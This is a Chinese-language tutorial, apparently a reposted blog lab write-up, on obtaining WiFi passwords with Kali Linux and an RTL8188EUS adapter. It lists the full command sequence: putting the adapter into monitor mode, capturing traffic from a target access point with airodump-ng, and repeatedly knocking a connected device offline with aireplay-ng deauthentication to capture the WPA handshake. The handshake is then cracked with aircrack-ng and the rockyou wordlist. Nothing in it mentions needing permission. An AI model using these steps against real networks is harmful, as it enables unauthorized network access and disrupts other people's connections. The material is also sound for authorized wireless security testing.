实验:使用Kali Linux和RTL8188EUS进行wifi密码获取
進行實驗前,先完成:
① 將無線網卡掛載到虛擬機上:將無線網卡插入到筆記本上并在彈出的“檢測到新的USB設備”窗口中選擇“連接到虛擬機”以及選中“虛擬機名稱中的虛擬機”,點擊確定。
② 使用命令
su root進入root模式
使用命令
airmon-ng查看該網卡是否支持監聽模式,如果PYH一欄為null,表示不支持監聽模式,這個時候可以通過安裝驅動器或者換一張網卡進行實驗,本次通過安裝驅動器完成實驗。
注意:網卡和驅動器一定要配套!!!
實驗過程:
1.首先進行安裝?RTL8188EUS的驅動器(?RTL8188EUS在安裝驅動器后才能進入監控模式)
?????????打開終端并通過命令 'sudo' 獲取管理員權限。
????????運行 "apt-get update" 命令來更新軟件包列表,然后再運行 "apt-get upgrade" 命令來升級現有的軟件包和依賴項。
????????安裝 'realtek-rtl8188eus-dkms' 軟件包。可以使用以下命令:sudo apt-get install realtek-rtl8188eus-dkms
????????等待驅動程序安裝完成,并重新啟動系統。可以在終端中使用 "reboot" 命令。
命令如下:
apt-get update && apt-get upgrade sudo apt-get install realtek-rtl8188eus-dkms reboot2.殺死一些影響--因為有些進程的存在會影響實驗結果
命令如下:
airmon-ng check kill?3.開啟無線監聽模式
airmon-ng start wlan0使用上述命令后wlan0可能會變成wlan0mon或者wlan0,這會影響第6步的命令。
4.開始監聽
下述命令中的wlan0根據使用ifconfig命令查看wlan0進入監聽模式的名稱是否改變,如果變成了wlan0mon就把下面命令的wlan0替換為wlan0mon。
airodump-ng wlan0這里就可以看到周邊的wifi信號,紅框框起來的為目標wifi。
5.(這個命令等到第6步時使用)開始抓包(格式:airodump-ng --bssid BSSID -c 信道頻率 -w 抓包存儲的路徑(這個路徑一定要記住) wlan0,bssid就是要抓取包的mac地址,信道頻率 是CH)
6.對已經連在目標wifi上的終端進行攻擊,通過讓他掉線重連以此來獲得數據報,這個時候需要再啟動一個命令窗口,一個命令窗口上使用如下命令:
airodump-ng --bssid 46:BF:14:E3:36:20 -c 8 -w /home/kali wlan0另一個命令窗口使用如下命令:
-a 后面是目標wifi的mac地址,-c 后面是連接到目標wifi的設備的mac地址
aireplay-ng -0 2 -a 46:BF:14:E3:36:20 -c C2:23:D6:5B:12:02 wlan0,并且這個命令要重復執行,直到另一個命令窗口右上角出現出現WPA handshake:******
7.使用kali自帶的字典進行解密
先使用命令
gzip -d /usr/share/wordlists/rockyou.txt.gz將kali自帶的字典解壓
再使用命令
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kali-01.cap/home/kali-01.cap是之前第5步讓記住的存放位置。
進行解密,等待......
總結
以上是生活随笔為你收集整理的实验:使用Kali Linux和RTL8188EUS进行wifi密码获取的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 盘点国产BI软件中,那些电商数据分析功能
- 下一篇: 转行要趁早 !一个过来人的忠告~